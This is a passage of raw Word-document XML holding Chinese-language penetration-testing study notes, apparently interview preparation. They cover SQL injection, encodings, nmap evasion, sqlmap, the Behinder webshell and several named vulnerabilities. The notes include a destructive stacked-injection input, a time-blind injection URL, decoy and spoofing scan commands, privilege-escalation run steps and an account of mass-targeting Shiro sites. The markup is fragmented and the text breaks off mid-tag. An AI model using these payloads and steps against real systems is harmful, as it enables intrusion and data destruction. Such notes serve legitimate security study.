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堆叠注入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在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/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堆叠注入的局限性:在于并不是每一个环境下都可以执行，可能受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>API或者数据库引擎不支持的限制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在我们的web系统中，因为代码通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的。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时间盲注原理、语句：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延迟注入，是一种盲注的手法, 提交对执行时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>敏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>感的函数sql语句，通过执行时间的长短来判断是否执行成功，比如:正确的话会导致时间很长，错误的话会导致执行时间很短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使用条件：没有回显，也不判断正确或错误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http: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</w:rPr>
        <w:t>//10.0.0.21/yanci.php?username=root' and If(ascii(substr(database(),1,1))=114,1,sleep(5))#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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t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任何URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>编码的字符都以%为前缀，其后是这个字符的两位十六进制ASCII代码。以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>下是一些常见的URL编码字符:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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  <w:t>%3d代表=;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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  <w:t>%25代表%;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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  <w:t>%20代表空格:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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  <w:t>%0a代表换行;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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  <w:t>%00代表空字节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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另一个值得注意的编码字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>是加号(+).它代表URL编码的空格(除%20。代表空格外))o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Unicode编码</w:t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16位Unicode编码的工作原理与URL编码类似。为通过HTTP进行传输.16位Unicod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>编码的字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>以，u为前缀，其后是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>这个字符的十六进制Unicode码点。例如:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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%u2215代/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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%u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>e9代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="60960" cy="11430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03" cy="11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UTF-8是一种长度可变的编码标准.它使用一个或几个字节表示每个字符。为通过HTTP进行传输，UTF-8编码的多字节字符以毛为前缀，其后用十六进制表示每个字节。例如:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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%c2%a9代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="92075" cy="120015"/>
            <wp:effectExtent l="0" t="0" r="14605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65" cy="1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</w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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%e2%89%a0代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="73025" cy="80010"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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49" cy="8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HTML编码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kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>&amp;quot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>;代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>;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&amp;apos:代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>;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&amp;amp;代表&amp;;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&amp;lt;代表&lt;;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&amp;g:;代表&gt;。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Base64，有着以下特征：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字符串的长度为4的整数倍。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字符串的符号取值只能在A-Z, a-z, 0-9, +, /, =共计65个字符中，且=如果出现就必须在结尾出现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial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VGh1IFdlYiBBcHBs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>aWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw==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十六进制编码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646166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:highlight w:val="yellow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nmap用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：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nmap绕过防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-sA ACK扫描，这项高级的扫描方法通常可以用来穿过防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-PB 这是默认的ping扫描选项。它使用ACK(-PT)和ICMP(-PI)两种扫描类型并行扫描。如果防火墙能够过滤其中一种包，使用这种方法，你就能够穿过防火墙。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙/IDS规避和欺骗：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-f; --mtu &lt;val&gt;：片段数据包（可选带给定mtu）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-D &lt;decoy1,decoy2[,ME],...&gt;: 用诱饵掩盖扫描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-S &lt;IP_Address&gt;: 欺骗源地址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-e &lt;iface&gt;: 使用指定的接口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-g/--source-port &lt;portnum&gt;: 使用给定的端口号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--proxies &lt;url1,[url2],...&gt;: 通过HTTP/SOCKS4代理中继连接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--ttl &lt;val&gt;: 设置IP生存时间字段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--spoof-mac &lt;mac address/prefix/vendor name&gt;: 欺骗你的mac地址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--badsum: 使用伪TCP/UDP/SCTP校验和发送数据包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Nmap简单的扫描方式：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全面扫描：nmap-T4 -A targetip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主机发现：nmap-T4 -sn targetip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端口扫描：nmap-T4 targetip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服务扫描：nmap-T4 -sV targetip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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>高级用法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操作系统扫描：nmap-T4 -O targetip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–iflist选项来查看本地主机的接口信息与路由信息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指定网口与IP地址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在Nmap可指定用哪个网口发送数据，-e &lt;interface&gt;选项。接口的详细信息可以参考–iflist选项输出结果。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示例：nmap -e eth0 targetip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Nmap也可以显式地指定发送的源端IP地址。使用-S &lt;spoofip&gt;选项，nmap将用指定的spoofip作为源端IP来发送探测包。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另外可以使用Decoy（诱骗）方式来掩盖真实的扫描地址，例如-D ip1,ip2,ip3,ip4,ME，这样就会产生多个虚假的ip同时对目标机进行探测，其中ME代表本机的真实地址，这样对方的防火墙不容易识别出是扫描者的身份。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 -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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定制探测包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Nmap提供–scanflags选项，用户可以对需要发送的TCP探测包的标志位进行完全的控制。可以使用数字或符号指定TCP标志位：URG, ACK, PSH,RST, SYN,and FIN。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例如，nmap -sX -T4 –scanflags URGACKPSHRSTSYNFINtargetip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此命令设置全部的TCP标志位为1，可以用于某些特殊场景的探测。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另外使用–ip-options可以定制IP包的options字段。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使用-S指定虚假的IP地址，-D指定一组诱骗IP地址（ME代表真实地址）。-e指定发送探测包的网络接口，-g（–source- port）指定源端口，-f指定使用IP分片方式发送探测包，–spoof-mac指定使用欺骗的MAC地址。–ttl指定生存时间。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7.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扫描防火墙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1）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SYN扫描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-sS  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Nmap默认扫描只扫描1000个最可能开放的端口，如果想扫描全部的端口，使用命令nmap -sS -T4-p-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instrText xml:space="preserve"> HYPERLINK "http://www.fakefirewall.com/" \t "https://www.cnblogs.com/sybboy/p/_blank"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t>www.fakefirewall.com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2）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FIN扫描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 -sF  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 -sF -T4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instrText xml:space="preserve"> HYPERLINK "http://www.fakefirewall.com/" \t "https://www.cnblogs.com/sybboy/p/_blank"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t>www.fakefirewall.com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3）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ACK扫描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-sA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利用ACK扫描判断端口是否被过滤。针对ACK探测包，未被过滤的端口（无论打开、关闭）会回复RST包。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</w:rPr>
        <w:t>nmap -sA -T4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instrText xml:space="preserve"> HYPERLINK "http://www.fakefirewall.com/" \t "https://www.cnblogs.com/sybboy/p/_blank"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t>www.fakefirewall.com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CC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8.脚本扫描：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-sC：相当于--script=default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  <w:t>--script=&lt;Lua scripts&gt;：&lt;Lua scripts&gt;是以逗号分隔的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Sqlmap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Sqlmap用于post包的选项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  抓包放在txt里，指定路径（可放置于工具一级目录，不用加路径）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 指定某一参数（双引号括起来 如 “id”）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高级用法：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--data=DATA         通过POST发送的数据字符串（例如“id=1”）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--cookie=COOKIE      cookie头值（例如“PHPSESSID=a8d127e….”）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--random-agent      使用随机选择的HTTP用户代理头值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--proxy=PROXY       使用代理连接到目标URL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--batch             批处理从不要求用户输入，使用默认行为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--flush-session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        刷新会话刷新当前目标的会话文件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华为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secdo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kerlmg，xsecure-dbscan，nmap，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nexpose，secVAS,CSpider,AWVS,secscan,secbinarycheck,codecheck,codedex,securecat,virusscan.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冰蝎的加密原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。老牌 Webshell 管理神器——中国菜刀的攻击流量特征明显，容易被各类安全设备检测，实际场景中越来越少使用，加密 Webshell 正变得日趋流行。由于通信流量被加密，传统的 WAF、IDS 设备难以检测，给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密，且加密秘钥是由随机数函数动态生成，因此该客户端的流量几乎无法检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端和服务器（被上传冰蝎马的受害主机）的加密通信过程：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2894330" cy="277177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大致的加密通信流程即：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首先客户端以Get形式发起带密码的请求（形如 http://192.168.43.11/dvwa/shell.php?pass=645 的请求）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端产生随机密钥（使用随机数MD5的高16位作为密钥），将密钥写入Session并将密钥返回客户端；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端获取密钥后，将Poyload（待执行的攻击命令）用AES算法（或者XOR运算）加密，用POST形式发送请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端收到请求，用Session中的密钥解密请求的Body部分，之后执行Payload，将直接结果返回到客户端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端获取服务端返回结果，回显到客户端UI界面上。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spring的Spring Cloud Gateway 代码注入漏洞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漏洞等级：10 | 严重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漏洞描述：当启用、暴露和不安全的 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序容易受到代码注入攻击。远程攻击者可以发出恶意制作的请求，允许在远程主机上进行任意远程执行。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影响范围：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Spring Cloud Gateway 3.1 ：3.1.0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Spring Cloud Gateway 3.0：3.0.0-3.0.6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早期不受支持的版本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怎么处理代码审计工具的误报从白盒验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方向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xff头和client头的区别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研判经历：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发现告警，看见cookie中插入paylod，是一条命令执行语句，unicode+base64双重编码，执行命令是whoami，响应包未执行，立刻将ip拉入黑名单，将ip交给溯源组，发现是使用国外代理，无法追踪。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应急响应经历:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就在北京遇到一个网站被植入Webshell的这个事情，之后排查入侵方式，首先我是拿了D盾工具去查杀webshell，然后通过发现的webshell这个文件的创建时间点，去翻看相关日期的访问日志，拿那个星图日志分析工具去对web日志进行分析，经过日志分析，在文件创建的时间节点并未发现可疑的上传，但发现存在可疑的webservice接口，访问webservice接口，发现变量：buffer、distinctpach、newfilename可以在客户端自定义，尝试对漏洞进行复现，可成功上传webshell，控制网站服务器，最后清除webshell并对webservice接口进行代码修复。恢复正常业务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应急响应（挖矿病毒）：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接到通报，地址是一台路由器的地址，挖矿病毒的特征就是会不断请求与外网矿池连接，所以就到内网核心交换机的地方，用wireshark对交换机镜像流量口抓包，使用过滤命令dns.qry.name==’’castaic.vaincues.com’’,得到两台机器ip，其中一台是客户上级的进行通知，对另一台服务器进行检查，cpu、带宽都不高，因为病毒在内网，请求不到，没有工作，用火绒、360杀毒成功杀死。开始寻找源头：是由于这台机器使用过外网使用的移动储存设备，造成传染。             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挖过印象最深的漏洞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广州地铁一站通 逻辑漏洞  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刚开启网上功能时进行测试 注册完自己账号之后想寻找弱口令，敏感信息泄露等一些漏洞。 之后又测试了密码找回功能 ，接收到一封找回密码的邮件 发现需要key和验证码双重验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>心想这个key和验证码有没有校验 然后拿自己账号测试 使用brupsutie抓包 去掉key，爆破四位验证码，然后就发现返回了几十个重置成功，很明白了，根本没有校验key，只要验证码正确了就可以重置密码，为什么会返回几十个重置成功的呢，因为session保存着所有找回密码的用户，都被重置成功了，不过我不知道他们的手机号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CSDN账号：MH cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux内核提权编号CVE-2022-0847</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：上传提权脚本文件，编译或者加文件权限，执行后就是root权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc exploit.c -o exploit    ./eploit另一个  chmod 777 linux内核提权.sh    ./linux内核提权.sh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小猫（vpn客户端）远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在设置的订阅链接那里，有一个添加配置文件的地方，拖进exp，对方执行就可以了，风险小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通达OA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部办公系统搭建在公网上，先用注入，爆出，利用工具里抓取管理员cookie，登录替换cookie就登录后台成功，找到一个功能点，成功上传webshell，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>北京交通大学旁站漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>农业管理系统未授权访问（bp插件发现），后台admin账号弱口令，报错敏感信息。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向日葵远程代码执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.0.0.33以下版本受影响，SunloginClient 启动后会在 40000 -60000随机开放一个web端口，认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现：连接向日葵以后，用scanport扫对方IP的端口，执行curl测试一下，我们使用EXP（python写的）获取Token，bp上构造一个get包，URL里放payload，cmd=ping../上一级目录到C盘，接window/system32/ipconfig，ip和端口改下，把获取到的token替换到cookie的cid参数里，回包里就有网卡信息了，也可以指定其他命令执行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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strus2SHIRO-550 反序列化漏洞</w:t>
      </w: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>验证shiro框架：在登录输入框，抓包请求包和回报里有rememberme字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批量找：fofa输入shiro，就可以获得大量相应指纹的网站，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用：网址复制进去后，用利用工具爆破秘钥轮询，构造攻击链，注入内存马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原理：shiro 默认使用了 CookieRememberMeManager，其处理 cookie 的流程是：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得到 rememberMe 的 cookie 值–&gt;Base64 解码–&gt;AES 解密–&gt;反序列化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AES 的密钥是硬编码在代码里，就导致了反序列化的 RCE 漏洞 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHIRO-721 反序列化漏洞</w:t>
      </w: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>不需要 key，利用 Padding Oracle Attack 构造出 RememberMe 字段后段的值结合合法的 RememberMe cookie 即可完成攻击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Log4j2漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理：lookup功能提供对配置环境的读取，如果输入参数符合格式就可以查询到敏感配置信息，而且look up同时支持jndi和rmi服务，可以通过jndi协议指向恶意服务的恶意rmi服务，到达远程代码执行的攻击效果。修复：mever米玩儿文件中版本改为2.15版本以上，自动更新。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
